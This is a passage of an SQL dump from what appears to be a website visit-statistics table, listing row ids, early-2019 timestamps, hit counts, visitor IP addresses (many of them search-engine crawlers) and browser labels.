180.76.15.137','other'),(363900,1546418445,5,5,0,0,'216.244.66.241','other'),(363901,1546419209,1,1,0,0,'37.53.123.48','chrome'),(363902,1546419276,1,1,0,0,'46.229.168.139','other'),(363903,1546419278,1,1,0,0,'46.229.168.137','other'),(363904,1546419800,2,2,0,0,'37.9.113.148','other'),(363905,1546419893,5,5,0,0,'5.45.207.79','other'),(363906,1546419911,1,1,0,0,'87.250.224.65','other'),(363907,1546419928,2,2,0,0,'5.45.207.19','other'),(363908,1546419952,1,1,0,0,'66.249.66.61','chrome'),(363909,1546419953,1,1,0,0,'66.249.66.42','chrome'),(363910,1546420076,2,2,0,0,'141.8.142.103','other'),(363911,1546420087,2,2,0,0,'178.154.244.11','other'),(363912,1546420534,1,1,0,0,'8.29.198.25','other'),(363913,1546421091,4,4,0,0,'216.244.66.241','other'),(363914,1546421428,1,1,0,0,'8.29.198.26','other'),(363915,1546421651,1,1,0,0,'91.196.178.39','chrome'),(363916,1546421700,1,1,0,0,'157.55.39.57','other'),(363917,1546421758,1,1,0,0,'141.8.142.103','other'),(363918,1546421877,1,1,0,0,'46.229.168.132','other'),(363919,1546422200,2,2,0,0,'37.55.127.223','chrome'),(363920,1546422523,2,2,0,0,'91.196.178.83','chrome'),(363921,1546422952,1,1,0,0,'66.249.66.154','chrome'),(363922,1546423117,1,1,0,0,'95.163.255.113','other'),(363923,1546423220,1,1,0,0,'95.163.255.119','other'),(363924,1546423879,7,7,0,0,'216.244.66.241','other'),(363925,1546424019,1,1,0,0,'92.112.168.217','chrome'),(363926,1546424400,1,1,0,0,'103.57.121.22','chrome'),(363927,1546424825,1,1,0,0,'95.163.255.181','other'),(363928,1546424827,5,5,0,0,'216.244.66.241','other'),(363929,1546424925,2,2,0,0,'91.196.178.187','chrome'),(363930,1546425964,2,2,0,0,'66.249.66.156','chrome'),(363931,1546426159,2,2,0,0,'95.163.255.107','other'),(363932,1546426247,1,1,0,0,'95.163.255.103','other'),(363933,1546426482,1,1,0,0,'95.163.255.102','other'),(363934,1546426685,5,5,0,0,'216.244.66.241','other'),(363935,1546426985,1,1,0,0,'66.249.66.152','chrome'),(363936,1546427003,1,1,0,0,'157.55.39.57','other'),(363937,1546427086,1,1,0,0,'91.196.178.187','chrome'),(363938,1546427324,7,7,0,0,'5.45.207.79','other'),(363939,1546427345,2,2,0,0,'37.9.113.148','other'),(363940,1546427455,1,1,0,0,'95.108.213.4','other'),(363941,1546427571,1,1,0,0,'66.249.66.42','chrome'),(363942,1546427599,1,1,0,0,'216.244.66.241','other'),(363943,1546427612,1,1,0,0,'5.45.207.19','other'),(363944,1546427621,1,1,0,0,'178.216.230.65','chrome'),(363945,1546428016,1,1,0,0,'178.154.244.11','other'),(363946,1546428262,1,1,0,0,'54.36.148.203','other'),(363947,1546428355,1,1,0,0,'54.36.148.130','other'),(363948,1546428384,1,1,0,0,'46.229.168.151','other'),(363949,1546428386,1,1,0,0,'46.229.168.142','other'),(363950,1546428431,1,1,0,0,'91.236.184.19','chrome'),(363951,1546428642,1,1,0,0,'54.36.148.235','other'),(363952,1546428680,1,1,0,0,'46.229.168.146','other'),(363953,1546428783,1,1,0,0,'54.36.148.38','other'),(363954,1546428904,1,1,0,0,'46.229.168.132','other'),(363955,1546428906,1,1,0,0,'46.229.168.139','other'),(363956,1546429498,3,3,0,0,'216.244.66.241','other'),(363957,1546430041,1,1,0,0,'54.36.148.233','other'),(363958,1546430270,1,1,0,0,'46.229.168.150','other'),(363959,1546430300,1,1,0,0,'40.77.167.132','other'),(363960,1546430385,1,1,0,0,'46.229.168.137','other'),(363961,1546430437,1,1,0,0,'95.163.255.194','other'),(363962,1546430457,2,2,0,0,'54.36.148.167','other'),(363963,1546430523,1,1,0,0,'66.249.66.154','chrome'),(363964,1546430671,1,1,0,0,'54.36.148.127','other'),(363965,1546431146,2,2,0,0,'216.244.66.241','other'),(363966,1546431346,2,2,0,0,'91.196.178.52','chrome'),(363967,1546431367,2,2,0,0,'8.29.198.27','other'),(363968,1546431428,1,1,0,0,'54.36.149.85','other'),(363969,1546431512,1,1,0,0,'54.36.148.64','other'),(363970,1546431612,1,1,0,0,'195.5.18.3','chrome'),(363971,1546431711,1,1,0,0,'46.229.168.132','other'),(363972,1546432052,1,1,0,0,'54.36.148.137','other'),(363973,1546432222,1,1,0,0,'90.188.255.142','chrome'),(363974,1546432297,10,10,0,0,'216.244.66.241','other'),(363975,1546432323,1,1,0,0,'54.36.148.151','other'),(363976,1546432388,2,2,0,0,'91.196.178.87','firefox'),(363977,1546432503,1,1,0,0,'95.163.255.93','other'),(363978,1546432507,1,1,0,0,'95.163.255.96','other'),(363979,1546432646,1,1,0,0,'91.196.178.187','chrome'),(363980,1546432690,1,1,0,0,'54.36.148.235','other'),(363981,1546432945,1,1,0,0,'54.36.148.187','other'),(363982,1546433054,1,1,0,0,'54.36.149.6','other'),(363983,1546433234,3,3,0,0,'95.158.49.55','other'),(363984,1546433253,1,1,0,0,'54.36.149.52','other'),(363985,1546433285,1,1,0,0,'54.36.148.150','other'),(363986,1546433630,3,3,0,0,'216.244.66.241','other'),(363987,1546433683,1,1,0,0,'157.55.39.132','other'),(363988,1546433756,1,1,0,0,'157.55.39.201','other'),(363989,1546433930,1,1,0,0,'54.36.148.131','other'),(363990,1546434205,2,2,0,0,'91.196.178.163','chrome'),(363991,1546434215,1,1,0,0,'54.36.148.72','other'),(363992,1546434256,1,1,0,0,'157.55.39.189','other'),(363993,1546434269,1,1,0,0,'213.180.203.23','other'),(363994,1546434277,1,1,0,0,'195.114.136.43','chrome'),(363995,1546434519,1,1,0,0,'54.36.148.134','other'),(363996,1546434912,1,1,0,0,'54.36.148.87','other'),(363997,1546435107,10,10,0,0,'216.244.66.241','other'),(363998,1546435117,1,1,0,0,'54.36.148.23','other'),(363999,1546435154,1,1,0,0,'91.196.178.70','chrome'),(364000,1546435169,1,1,0,0,'54.36.148.123','other'),(364001,1546435776,1,1,0,0,'54.36.148.75','other'),(364002,1546435821,1,1,0,0,'54.36.148.245','other'),(364003,1546435949,1,1,0,0,'46.229.168.151','other'),(364004,1546435972,1,1,0,0,'5.45.207.79','other'),(364005,1546436030,1,1,0,0,'37.9.113.148','other'),(364006,1546436042,1,1,0,0,'87.250.224.64','other'),(364007,1546436050,1,1,0,0,'141.8.183.23','other'),(364008,1546436098,1,1,0,0,'54.36.148.232','other'),(364009,1546436116,2,2,0,0,'178.154.244.11','other'),(364010,1546436134,1,1,0,0,'141.8.142.103','other'),(364011,1546436147,1,1,0,0,'178.154.171.24','other'),(364012,1546436363,1,1,0,0,'54.36.149.102','other'),(364013,1546436393,1,1,0,0,'216.244.66.241','other'),(364014,1546436426,1,1,0,0,'95.108.213.50','other'),(364015,1546436506,2,2,0,0,'95.108.213.4','other'),(364016,1546436509,1,1,0,0,'87.250.224.107','other'),(364017,1546436516,2,2,0,0,'95.108.181.54','other'),(364018,1546436529,1,1,0,0,'54.36.148.228','other'),(364019,1546436714,1,1,0,0,'5.255.253.38','other'),(364020,1546436776,1,1,0,0,'46.211.134.178','chrome'),(364021,1546436828,1,1,0,0,'54.36.148.31','other'),(364022,1546436837,1,1,0,0,'141.8.183.22','other'),(364023,1546436839,1,1,0,0,'141.8.142.81','other'),(364024,1546436998,2,2,0,0,'91.196.178.134','firefox'),(364025,1546437081,1,1,0,0,'54.36.149.4','other'),(364026,1546437083,1,1,0,0,'54.36.148.75','other'),(364027,1546437098,2,2,0,0,'77.111.244.186','chrome'),(364028,1546437141,1,1,0,0,'54.36.148.64','other'),(364029,1546437183,1,1,0,0,'54.36.149.9','other'),(364030,1546437195,1,1,0,0,'54.36.148.215','other'),(364031,1546437235,2,2,0,0,'91.196.178.69','chrome'),(364032,1546437365,1,1,0,0,'54.36.148.124','other'),(364033,1546437665,1,1,0,0,'54.36.148.25','other'),(364034,1546437755,1,1,0,0,'54.36.148.211','other'),(364035,1546437947,1,1,0,0,'13.66.139.0','other'),(364036,1546438116,5,5,0,0,'216.244.66.241','other'),(364037,1546438182,2,2,0,0,'95.134.221.92','firefox'),(364038,1546438229,1,1,0,0,'54.36.149.52','other'),(364039,1546438293,1,1,0,0,'95.163.255.184','other'),(364040,1546438296,1,1,0,0,'95.163.255.168','other'),(364041,1546438806,1,1,0,0,'54.36.148.202','other'),(364042,1546438986,2,2,0,0,'91.196.178.83','chrome'),(364043,1546439047,1,1,0,0,'54.36.149.49','other'),(364044,1546439119,1,1,0,0,'54.36.148.150','other'),(364045,1546439120,1,1,0,0,'54.36.148.217','other'),(364046,1546439139,1,1,0,0,'54.36.149.54','other'),(364047,1546439390,1,1,0,0,'54.36.149.37','other'),(364048,1546439802,2,2,0,0,'95.163.255.94','other'),(364049,1546439805,1,1,0,0,'95.163.255.97','other'),(364050,1546439809,1,1,0,0,'95.163.255.93','other'),(364051,1546440020,1,1,0,0,'5.196.87.54','other'),(364052,1546440351,1,1,0,0,'54.36.148.226','other'),(364053,1546440359,1,1,0,0,'91.196.178.187','chrome'),(364054,1546440485,1,1,0,0,'54.36.148.255','other'),(364055,1546440755,13,13,0,0,'216.244.66.241','other'),(364056,1546441285,1,1,0,0,'46.229.168.134','other'),(364057,1546441287,1,1,0,0,'46.229.168.144','other'),(364058,1546441424,1,1,0,0,'91.196.178.187','chrome'),(364059,1546441699,1,1,0,0,'46.229.168.136','other'),(364060,1546441977,1,1,0,0,'46.229.168.141','other'),(364061,1546441979,1,1,0,0,'46.229.168.151','other'),(364062,1546442189,1,1,0,0,'216.244.66.241','other'),(364063,1546442200,2,2,0,0,'8.29.198.26','other'),(364064,1546442623,1,1,0,0,'207.46.13.107','other'),(364065,1546443557,1,1,0,0,'95.163.255.95','other'),(364066,1546443560,1,1,0,0,'95.163.255.97','other'),(364067,1546443586,5,5,0,0,'216.244.66.241','other'),(364068,1546444151,1,1,0,0,'95.163.255.162','other'),(364069,1546444153,1,1,0,0,'95.163.255.159','other'),(364070,1546444499,2,2,0,0,'216.244.66.241','other'),(364071,1546444887,1,1,0,0,'46.229.168.144','other'),(364072,1546445678,1,1,0,0,'5.45.207.19','other'),(364073,1546445702,6,6,0,0,'178.154.244.11','other'),(364074,1546445920,4,4,0,0,'5.45.207.79','other'),(364075,1546445942,1,1,0,0,'37.9.113.148','other'),(364076,1546446159,1,1,0,0,'141.8.142.103','other'),(364077,1546446220,1,1,0,0,'66.249.66.156','chrome'),(364078,1546446516,1,1,0,0,'95.163.255.114','other'),(364079,1546446540,1,1,0,0,'95.163.255.115','other'),(364080,1546446571,1,1,0,0,'95.163.255.119','other'),(364081,1546446594,1,1,0,0,'95.163.255.118','other'),(364082,1546446600,2,2,0,0,'95.108.181.75','other'),(364083,1546446605,2,2,0,0,'178.154.244.11','other'),(364084,1546446613,2,2,0,0,'5.45.207.19','other'),(364085,1546446619,1,1,0,0,'95.163.255.104','other'),(364086,1546446646,1,1,0,0,'95.163.255.109','other'),(364087,1546446659,1,1,0,0,'46.229.168.135','other'),(364088,1546446821,1,1,0,0,'5.45.207.79','other'),(364089,1546446888,1,1,0,0,'46.229.168.137','other'),(364090,1546446983,1,1,0,0,'66.249.66.154','chrome'),(364091,1546447086,2,2,0,0,'216.244.66.241','other'),(364092,1546447339,2,2,0,0,'46.211.26.107','chrome'),(364093,1546447419,1,1,0,0,'66.249.66.61','chrome'),(364094,1546447420,1,1,0,0,'66.249.66.42','chrome'),(364095,1546447515,1,1,0,0,'46.229.168.154','other'),(364096,1546447523,1,1,0,0,'46.229.168.133','other'),(364097,1546448296,2,2,0,0,'5.45.207.19','other'),(364098,1546448534,1,1,0,0,'46.229.168.133','other'),(364099,1546448948,2,2,0,0,'46.211.51.171','chrome'),(364100,1546449523,3,3,0,0,'216.244.66.241','other'),(364101,1546449848,1,1,0,0,'66.249.66.155','chrome'),(364102,1546449849,1,1,0,0,'66.249.66.156','chrome'),(364103,1546450470,5,5,0,0,'216.244.66.241','other'),(364104,1546451249,2,2,0,0,'46.211.51.171','chrome'),(364105,1546452272,1,1,0,0,'40.77.167.119','other'),(364106,1546452835,8,8,0,0,'216.244.66.241','other'),(364107,1546453027,1,1,0,0,'8.29.198.25','other'),(364108,1546453336,1,1,0,0,'95.163.255.95','other'),(364109,1546453339,1,1,0,0,'95.163.255.97','other'),(364110,1546453479,1,1,0,0,'46.229.168.152','other'),(364111,1546453702,1,1,0,0,'46.229.168.132','other'),(364112,1546453703,1,1,0,0,'46.229.168.138','other'),(364113,1546453856,1,1,0,0,'207.46.13.137','other'),(364114,1546453872,2,2,0,0,'141.8.142.103','other'),(364117,1546453940,1,1,0,0,'8.29.198.27','other'),(364118,1546453961,2,2,0,0,'216.244.66.241','other'),(364119,1546454046,2,2,0,0,'91.209.11.236','other'),(364120,1546454454,1,1,0,0,'5.228.174.13','msie'),(364121,1546454565,1,1,0,0,'46.229.168.152','other'),(364122,1546454814,1,1,0,0,'157.55.39.79','other'),(364123,1546454854,1,1,0,0,'95.163.255.98','other'),(364124,1546454856,1,1,0,0,'95.163.255.92','other'),(364125,1546454860,1,1,0,0,'95.163.255.97','other'),(364126,1546454862,1,1,0,0,'95.163.255.94','other'),(364127,1546455369,1,1,0,0,'46.229.168.140','other'),(364128,1546455541,2,2,0,0,'137.74.167.96','other'),(364129,1546455661,1,1,0,0,'87.250.224.65','other'),(364130,1546455669,2,2,0,0,'141.8.142.103','other'),(364131,1546455735,2,2,0,0,'5.45.207.19','other'),(364132,1546455849,2,2,0,0,'37.9.113.103','other'),(364133,1546455888,2,2,0,0,'95.108.213.4','other'),(364134,1546455901,1,1,0,0,'87.250.224.47','other'),(364135,1546455952,2,2,0,0,'5.45.207.79','other'),(364136,1546456045,2,2,0,0,'37.9.113.148','other'),(364137,1546456075,4,4,0,0,'216.244.66.241','other'),(364138,1546456114,1,1,0,0,'157.55.39.122','other'),(364139,1546456331,1,1,0,0,'46.229.168.132','other'),(364140,1546457053,1,1,0,0,'46.229.168.136','other'),(364141,1546457078,2,2,0,0,'91.209.11.236','other'),(364142,1546457397,3,3,0,0,'216.244.66.241','other'),(364143,1546457491,1,1,0,0,'95.163.255.157','other'),(364144,1546457502,1,1,0,0,'95.163.255.190','other'),(364145,1546457526,1,1,0,0,'40.77.167.45','other'),(364146,1546458230,2,2,0,0,'91.196.178.189','chrome'),(364147,1546458245,5,5,0,0,'45.40.166.141','firefox'),(364148,1546459037,9,9,0,0,'216.244.66.241','other'),(364149,1546459161,1,1,0,0,'93.72.68.147','chrome'),(364150,1546459399,1,1,0,0,'46.229.168.130','other'),(364151,1546459449,1,1,0,0,'157.55.39.207','other'),(364152,1546459830,1,1,0,0,'40.77.167.26','other'),(364153,1546460419,1,1,0,0,'40.77.167.38','other'),(364154,1546460726,2,2,0,0,'95.163.255.94','other'),(364155,1546461188,1,1,0,0,'157.55.39.207','other'),(364156,1546461612,1,1,0,0,'46.229.168.130','other'),(364157,1546461900,11,11,0,0,'216.244.66.241','other'),(364158,1546462135,1,1,0,0,'95.163.255.185','other'),(364159,1546462140,1,1,0,0,'95.163.255.160','other'),(364160,1546462387,1,1,0,0,'92.113.127.235','chrome'),(364161,1546462693,2,2,0,0,'66.249.66.42','chrome'),(364162,1546462934,2,2,0,0,'216.244.66.241','other'),(364163,1546462957,1,1,0,0,'46.229.168.152','other'),(364164,1546463397,1,1,0,0,'92.113.127.235','chrome'),(364165,1546463704,1,1,0,0,'157.55.39.207','other'),(364166,1546463791,1,1,0,0,'66.249.66.155','chrome'),(364168,1546463807,1,1,0,0,'46.229.168.129','other'),(364169,1546463848,1,1,0,0,'8.29.198.25','other'),(364170,1546464777,1,1,0,0,'8.29.198.27','other'),(364171,1546464865,1,1,0,0,'40.77.167.26','other'),(364172,1546465008,7,7,0,0,'216.244.66.241','other'),(364173,1546465143,1,1,0,0,'40.77.167.24','other'),(364174,1546465881,4,4,0,0,'5.45.207.79','other'),(364175,1546465939,1,1,0,0,'46.229.168.138','other'),(364176,1546465959,3,3,0,0,'141.8.142.103','other'),(364177,1546466472,1,1,0,0,'66.249.66.157','chrome'),(364178,1546466473,1,1,0,0,'66.249.66.156','chrome'),(364179,1546466526,1,1,0,0,'46.229.168.130','other'),(364180,1546466562,1,1,0,0,'123.163.253.214','other'),(364181,1546466947,1,1,0,0,'157.55.39.207','other'),(364182,1546466973,3,3,0,0,'5.45.207.19','other'),(364183,1546467131,1,1,0,0,'178.154.244.11','other'),(364184,1546467795,12,12,0,0,'216.244.66.241','other'),(364185,1546467957,2,2,0,0,'68.183.152.17','other'),(364186,1546468464,1,1,0,0,'46.229.168.143','other'),(364187,1546468696,2,2,0,0,'216.244.66.241','other'),(364188,1546468745,2,2,0,0,'40.77.167.81','other'),(364189,1546468807,1,1,0,0,'157.55.39.207','other'),(364190,1546469777,1,1,0,0,'18.220.216.237','firefox'),(364191,1546470179,1,1,0,0,'46.229.168.133','other'),(364192,1546470181,1,1,0,0,'46.229.168.136','other'),(364193,1546470494,1,1,0,0,'66.249.66.156','chrome'),(364194,1546470683,4,4,0,0,'216.244.66.241','other'),(364195,1546471074,1,1,0,0,'157.55.39.207','other'),(364196,1546471397,1,1,0,0,'128.72.0.2','chrome'),(364197,1546471567,2,2,0,0,'5.45.207.79','other'),(364198,1546472039,1,1,0,0,'40.77.167.26','other'),(364199,1546472160,1,1,0,0,'216.244.66.241','other'),(364200,1546472800,1,1,0,0,'46.229.168.153','other'),(364201,1546472850,1,1,0,0,'46.211.55.46','chrome'),(364202,1546473164,1,1,0,0,'95.163.255.194','other'),(364203,1546473167,1,1,0,0,'95.163.255.178','other'),(364204,1546473309,1,1,0,0,'66.249.66.156','chrome'),(364206,1546473497,1,1,0,0,'5.45.207.79','other'),(364207,1546473510,1,1,0,0,'95.163.255.179','other'),(364208,1546473514,1,1,0,0,'95.163.255.170','other'),(364209,1546473620,1,1,0,0,'66.249.66.40','chrome'),(364210,1546473660,1,1,0,0,'46.229.168.142','other'),(364211,1546473673,3,3,0,0,'216.244.66.241','other'),(364212,1546473727,1,1,0,0,'157.55.39.207','other'),(364213,1546474006,1,1,0,0,'66.249.66.42','chrome'),(364214,1546474074,1,1,0,0,'66.249.66.59','chrome'),(364216,1546474671,1,1,0,0,'8.29.198.25','other'),(364217,1546474841,1,1,0,0,'216.244.66.241','other'),(364218,1546474881,1,1,0,0,'66.249.66.157','chrome'),(364219,1546474882,1,1,0,0,'66.249.66.156','chrome'),(364220,1546475444,1,1,0,0,'95.163.255.177','other'),(364221,1546475446,1,1,0,0,'95.163.255.164','other'),(364222,1546475483,1,1,0,0,'46.229.168.144','other'),(364223,1546475619,1,1,0,0,'8.29.198.26','other'),(364224,1546475767,5,5,0,0,'66.147.244.183','firefox'),(364225,1546475931,1,1,0,0,'46.229.168.133','other'),(364226,1546476061,2,2,0,0,'95.108.213.4','other'),(364227,1546476089,3,3,0,0,'5.45.207.79','other'),(364228,1546476118,10,10,0,0,'178.154.244.11','other'),(364229,1546476121,6,6,0,0,'5.45.207.19','other'),(364230,1546476328,6,6,0,0,'141.8.142.103','other'),(364231,1546476437,1,1,0,0,'178.154.244.65','other'),(364232,1546476715,3,3,0,0,'216.244.66.241','other'),(364233,1546476932,1,1,0,0,'62.210.157.133','other'),(364234,1546477004,1,1,0,0,'87.250.224.65','other'),(364235,1546477019,1,1,0,0,'151.80.39.169','other'),(364236,1546477114,1,1,0,0,'66.249.66.156','chrome'),(364237,1546477115,1,1,0,0,'66.249.66.152','chrome'),(364238,1546477156,1,1,0,0,'37.9.113.148','other'),(364239,1546477200,1,1,0,0,'178.154.244.11','other'),(364240,1546477246,1,1,0,0,'5.45.207.79','other'),(364241,1546477382,1,1,0,0,'95.108.213.4','other'),(364242,1546477504,1,1,0,0,'157.55.39.189','other'),(364243,1546477614,1,1,0,0,'46.229.168.141','other'),(364244,1546478101,1,1,0,0,'40.77.167.155','other'),(364245,1546478113,1,1,0,0,'66.249.66.154','chrome'),(364246,1546478475,1,1,0,0,'141.8.142.103','other'),(364247,1546478641,1,1,0,0,'40.77.167.26','other'),(364248,1546478737,1,1,0,0,'95.163.255.163','other'),(364249,1546478741,1,1,0,0,'95.163.255.157','other'),(364250,1546479075,1,1,0,0,'46.229.168.139','other'),(364251,1546479126,1,1,0,0,'5.45.207.19','other'),(364252,1546479135,1,1,0,0,'46.229.168.149','other'),(364253,1546479451,2,2,0,0,'40.77.167.81','other'),(364254,1546479469,1,1,0,0,'157.55.39.207','other'),(364255,1546479633,5,5,0,0,'216.244.66.241','other'),(364256,1546480103,1,1,0,0,'66.249.66.152','chrome'),(364257,1546480373,1,1,0,0,'66.249.66.156','chrome'),(364258,1546480601,1,1,0,0,'46.229.168.138','other'),(364259,1546480603,1,1,0,0,'46.229.168.140','other'),(364260,1546481282,1,1,0,0,'157.55.39.79','other'),(364261,1546481397,1,1,0,0,'95.163.255.191','other'),(364262,1546481399,1,1,0,0,'95.163.255.161','other'),(364263,1546482525,9,9,0,0,'216.244.66.241','other'),(364264,1546483113,1,1,0,0,'95.163.255.171','other'),(364265,1546483116,1,1,0,0,'95.163.255.156','other'),(364266,1546483119,1,1,0,0,'157.55.39.207','other'),(364267,1546483352,2,2,0,0,'66.249.66.157','chrome'),(364268,1546483353,1,1,0,0,'66.249.66.152','chrome'),(364269,1546483355,1,1,0,0,'66.249.66.156','chrome'),(364270,1546483473,1,1,0,0,'141.8.142.103','other'),(364271,1546483715,1,1,0,0,'178.154.244.11','other'),(364272,1546483724,1,1,0,0,'66.249.66.154','chrome'),(364273,1546483794,1,1,0,0,'95.163.255.69','other'),(364274,1546483797,1,1,0,0,'95.163.255.68','other'),(364275,1546484192,2,2,0,0,'54.165.59.7','other'),(364276,1546484802,1,1,0,0,'5.45.207.79','other'),(364277,1546484908,2,2,0,0,'5.45.207.19','other'),(364278,1546485416,8,8,0,0,'216.244.66.241','other'),(364279,1546485500,1,1,0,0,'8.29.198.26','other'),(364280,1546485647,1,1,0,0,'178.154.171.17','other'),(364281,1546485670,2,2,0,0,'178.154.171.24','other'),(364282,1546485779,1,1,0,0,'54.165.59.7','other'),(364283,1546485830,1,1,0,0,'213.180.203.17','other'),(364284,1546485836,1,1,0,0,'87.250.224.107','other'),(364285,1546485914,1,1,0,0,'178.154.244.11','other'),(364286,1546486048,1,1,0,0,'5.45.207.19','other'),(364287,1546486140,1,1,0,0,'37.9.113.148','other'),(364288,1546486460,1,1,0,0,'8.29.198.27','other'),(364289,1546486616,1,1,0,0,'216.244.66.241','other'),(364290,1546486914,1,1,0,0,'95.163.255.177','other'),(364291,1546486918,1,1,0,0,'95.163.255.161','other'),(364292,1546487072,1,1,0,0,'95.163.255.96','other'),(364293,1546487075,1,1,0,0,'95.163.255.98','other'),(364294,1546487259,1,1,0,0,'95.163.255.92','other'),(364295,1546487262,1,1,0,0,'95.163.255.94','other'),(364296,1546487323,1,1,0,0,'46.229.168.139','other'),(364297,1546487345,1,1,0,0,'46.229.168.151','other'),(364298,1546487422,1,1,0,0,'157.55.39.207','other'),(364299,1546487753,6,6,0,0,'54.165.59.7','other'),(364300,1546488403,1,1,0,0,'66.249.66.154','chrome'),(364301,1546488425,5,5,0,0,'216.244.66.241','other'),(364302,1546488505,1,1,0,0,'66.249.66.152','chrome'),(364303,1546488563,1,1,0,0,'95.163.255.96','other'),(364304,1546488566,1,1,0,0,'95.163.255.97','other'),(364305,1546488585,1,1,0,0,'66.249.66.156','chrome'),(364306,1546488967,1,1,0,0,'54.165.59.7','other'),(364307,1546489428,1,1,0,0,'13.66.139.0','other'),(364308,1546489577,1,1,0,0,'8.37.235.60','chrome'),(364309,1546489578,1,1,0,0,'91.234.25.116','chrome'),(364310,1546490208,1,1,0,0,'95.163.255.180','other'),(364311,1546490211,1,1,0,0,'95.163.255.169','other'),(364312,1546490352,1,1,0,0,'46.229.168.142','other'),(364313,1546491173,7,7,0,0,'216.244.66.241','other'),(364314,1546491383,2,2,0,0,'207.46.13.27','other'),(364315,1546492181,1,1,0,0,'216.244.66.241','other'),(364316,1546492825,1,1,0,0,'95.163.255.92','other'),(364317,1546492830,1,1,0,0,'95.163.255.98','other'),(364318,1546493221,1,1,0,0,'178.154.244.11','other'),(364319,1546493390,1,1,0,0,'46.229.168.145','other'),(364320,1546493992,3,3,0,0,'216.244.66.241','other'),(364321,1546494313,1,1,0,0,'46.229.168.147','other'),(364322,1546494315,1,1,0,0,'46.229.168.148','other'),(364323,1546494840,1,1,0,0,'5.45.207.19','other'),(364324,1546495113,2,2,0,0,'34.217.131.108','chrome'),(364325,1546495925,2,2,0,0,'185.220.102.8','other'),(364326,1546495988,1,1,0,0,'37.115.190.73','chrome'),(364327,1546496212,1,1,0,0,'180.76.15.7','other'),(364328,1546496213,1,1,0,0,'180.76.15.21','other'),(364329,1546496270,3,3,0,0,'5.45.207.79','other'),(364330,1546496334,1,1,0,0,'8.29.198.27','other'),(364331,1546496397,3,3,0,0,'5.45.207.19','other'),(364332,1546496831,9,9,0,0,'216.244.66.241','other'),(364333,1546497026,6,6,0,0,'178.154.244.11','other'),(364334,1546497043,4,4,0,0,'141.8.142.103','other'),(364335,1546497171,6,6,0,0,'5.45.207.79','other'),(364336,1546497268,2,2,0,0,'91.196.178.67','chrome'),(364337,1546497269,1,1,0,0,'95.108.213.4','other'),(364338,1546497299,1,1,0,0,'8.29.198.27','other'),(364339,1546497328,8,8,0,0,'5.45.207.19','other'),(364340,1546497560,2,2,0,0,'91.124.182.170','firefox'),(364341,1546497568,1,1,0,0,'66.249.66.40','chrome'),(364342,1546497786,1,1,0,0,'92.52.175.191','chrome'),(364343,1546497808,1,1,0,0,'37.9.113.20','other'),(364344,1546497889,1,1,0,0,'95.163.255.194','other'),(364345,1546497892,1,1,0,0,'95.163.255.162','other'),(364346,1546498052,1,1,0,0,'95.163.255.192','other'),(364347,1546498055,1,1,0,0,'95.163.255.180','other'),(364348,1546498061,1,1,0,0,'141.8.142.103','other'),(364349,1546498112,2,2,0,0,'178.154.244.11','other'),(364350,1546498192,3,3,0,0,'5.45.207.79','other'),(364351,1546498361,1,1,0,0,'5.45.207.19','other'),(364352,1546498363,1,1,0,0,'87.250.224.47','other'),(364353,1546498546,1,1,0,0,'46.229.168.140','other'),(364354,1546498583,8,8,0,0,'178.63.26.114','other'),(364355,1546499180,1,1,0,0,'5.45.207.79','other'),(364356,1546499669,4,4,0,0,'216.244.66.241','other'),(364357,1546499930,2,2,0,0,'91.196.178.67','chrome'),(364358,1546499936,1,1,0,0,'40.77.167.28','other'),(364359,1546500018,1,1,0,0,'46.229.168.137','other'),(364360,1546500019,1,1,0,0,'46.229.168.152','other'),(364361,1546500376,1,1,0,0,'46.229.168.153','other'),(364362,1546500683,2,2,0,0,'91.196.178.187','chrome'),(364363,1546500725,2,2,0,0,'91.196.178.163','chrome'),(364364,1546500967,1,1,0,0,'95.163.255.193','other'),(364365,1546500969,1,1,0,0,'95.163.255.151','other'),(364366,1546501218,1,1,0,0,'95.163.255.99','other'),(364367,1546501220,3,3,0,0,'95.163.255.92','other'),(364368,1546501337,1,1,0,0,'95.163.255.95','other'),(364369,1546501355,1,1,0,0,'95.163.255.98','other'),(364370,1546501564,2,2,0,0,'46.229.168.132','other'),(364371,1546501566,1,1,0,0,'46.229.168.151','other'),(364372,1546502408,1,1,0,0,'46.229.168.147','other'),(364373,1546502420,1,1,0,0,'46.229.168.139','other'),(364374,1546502462,3,3,0,0,'91.196.178.74','firefox'),(364375,1546502484,6,6,0,0,'216.244.66.241','other'),(364376,1546502578,1,1,0,0,'46.229.168.133','other'),(364377,1546502819,2,2,0,0,'38.145.112.114','chrome'),(364378,1546503923,1,1,0,0,'95.163.255.166','other'),(364379,1546503925,1,1,0,0,'95.163.255.195','other'),(364380,1546503936,1,1,0,0,'91.196.178.67','chrome'),(364381,1546504188,1,1,0,0,'66.249.66.156','chrome'),(364382,1546504240,1,1,0,0,'176.195.137.157','chrome'),(364383,1546504283,1,1,0,0,'141.8.142.103','other'),(364384,1546504511,1,1,0,0,'178.154.244.11','other'),(364385,1546504515,1,1,0,0,'5.45.207.79','other'),(364386,1546504690,2,2,0,0,'91.196.177.46','firefox'),(364387,1546505154,1,1,0,0,'46.229.168.143','other'),(364388,1546505156,1,1,0,0,'46.229.168.129','other'),(364389,1546505295,6,6,0,0,'216.244.66.241','other'),(364390,1546505912,1,1,0,0,'178.154.244.11','other'),(364391,1546506321,1,1,0,0,'40.77.167.28','other'),(364392,1546506373,1,1,0,0,'5.45.207.19','other'),(364393,1546506430,1,1,0,0,'46.229.168.152','other'),(364394,1546506432,1,1,0,0,'46.229.168.132','other'),(364395,1546506569,1,1,0,0,'216.244.66.241','other'),(364396,1546506692,1,1,0,0,'46.229.168.149','other'),(364397,1546507112,1,1,0,0,'66.249.66.154','chrome'),(364398,1546507165,1,1,0,0,'8.29.198.27','other'),(364399,1546508042,1,1,0,0,'46.229.168.154','other'),(364400,1546508045,1,1,0,0,'46.229.168.132','other'),(364401,1546508138,1,1,0,0,'8.29.198.27','other'),(364402,1546508188,10,10,0,0,'216.244.66.241','other'),(364403,1546508223,1,1,0,0,'46.201.251.231','chrome'),(364404,1546508325,1,1,0,0,'151.80.39.117','other'),(364405,1546508342,1,1,0,0,'95.163.255.150','other'),(364406,1546508345,1,1,0,0,'95.163.255.172','other'),(364407,1546508718,7,7,0,0,'178.154.244.11','other'),(364408,1546508757,3,3,0,0,'141.8.142.103','other'),(364409,1546508812,6,6,0,0,'5.45.207.79','other'),(364410,1546508870,1,1,0,0,'46.229.168.137','other'),(364411,1546508877,3,3,0,0,'5.45.207.19','other'),(364412,1546509018,1,1,0,0,'95.163.255.189','other'),(364413,1546509022,1,1,0,0,'95.163.255.165','other'),(364414,1546509083,1,1,0,0,'95.163.255.176','other'),(364415,1546509084,1,1